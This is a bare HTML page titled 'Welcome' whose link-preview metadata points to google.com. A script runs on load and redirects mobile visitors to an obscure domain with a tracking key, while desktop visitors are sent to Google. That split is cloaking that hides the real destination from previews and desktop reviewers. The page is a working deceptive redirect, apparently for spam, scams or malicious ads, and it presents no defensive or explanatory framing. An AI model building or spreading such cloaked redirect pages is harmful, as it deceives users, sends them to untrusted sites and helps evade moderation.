<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome</title>

    <meta property="og:title" content="🩷 ❤️ 🧡">
    <meta property="og:description" content="">
    <meta property="og:image" content="https://s3.us-east-2.amazonaws.com/img-utils-conversions.pixelied.com/conversions/Sun-Jul-19-2026/93e3326a-a6bf-4182-99b8-44bad07058b7/54d977f8-e89d-48ad-9f2f-6115a8fc2b02.tiff">
    <meta property="og:url" content="https://www.google.com">
    <meta property="og:type" content="website">

    <script>
    document.addEventListener('DOMContentLoaded', function() {
        var isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        var screenWidth = window.innerWidth;

        if (isMobile || screenWidth <= 768) {
            window.location.href = "https://exteriorsingularsharply.com/k1j6nnny?key=9bdb0afefbacf9d33415e3f01565d805";
        } else {
            window.location.href = "https://www.google.com";
        }
    });
    </script>
</head>
<body>
</body>
</html>
